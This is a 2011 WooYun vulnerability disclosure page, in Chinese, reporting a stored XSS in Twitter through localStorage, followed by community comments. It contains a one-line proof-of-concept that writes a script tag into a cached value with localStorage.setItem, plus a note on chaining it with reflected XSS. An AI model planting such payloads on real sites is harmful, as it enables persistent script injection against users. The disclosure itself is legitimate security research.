当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03075

漏洞标题:twitter的localStorage的xss

相关厂商:twitter

漏洞作者: 呆子不开口

提交时间:2011-10-22 00:27

修复时间:2011-10-22 10:23

公开时间:2011-10-22 10:23

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

很鸡肋,但挺有意思,我使用你的电脑后就可以给你种个xss

详细说明:

知道目标用户的id,在当前域执行下js
localStorage.setItem(":USER:",'{"54lvwei":{"value":{"store":{"recentFollowers":{"value":"hellolvwei<script>alert(/aaaaaa/)</script>"}}}}}');
即可,配合反射xss效果更佳

漏洞证明:

修复方案:

对localStorage里的数据进行过滤验证后再放入html中

版权声明:转载请注明来源 呆子不开口@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)

漏洞评价:

评论

  1. 2011-10-22 10:25 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这不就是传说中的rootkit后门么

  2. 2011-10-22 16:01 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    爽啊爽 哈哈 这种实例忒爽了

  3. 2011-10-22 16:07 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    请赞助作者5块钱

  4. 2011-10-22 17:00 | 瞌睡龙 ( 实习白帽子 | Rank:59 漏洞数:5 | fighting……)

    代表twitter奖励lz路边哈密瓜一个,速来认领 :)

  5. 2011-10-23 01:17 | GaRY ( 实习白帽子 | Rank:39 漏洞数:3 | 真悲剧平男君)

    这个不错,可以加精

  6. 2011-10-23 08:49 | 呆子不开口 ( 普通白帽子 | Rank:324 漏洞数:25 | 求各种兼职)

    5块钱够干什么的呀,瞌睡龙快过来帮我含住,那5块钱给你了。还有,twitter这个单位是做什么的,怎么联系不到,在海淀没有分公司么

  7. 2011-10-25 15:40 | 霍家二爷 ( 实习白帽子 | Rank:63 漏洞数:7 | 我撸管这么牛逼还是没妞喜欢我)

    这个不错

  8. 2013-04-01 09:32 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    大牛发的 都是这么精华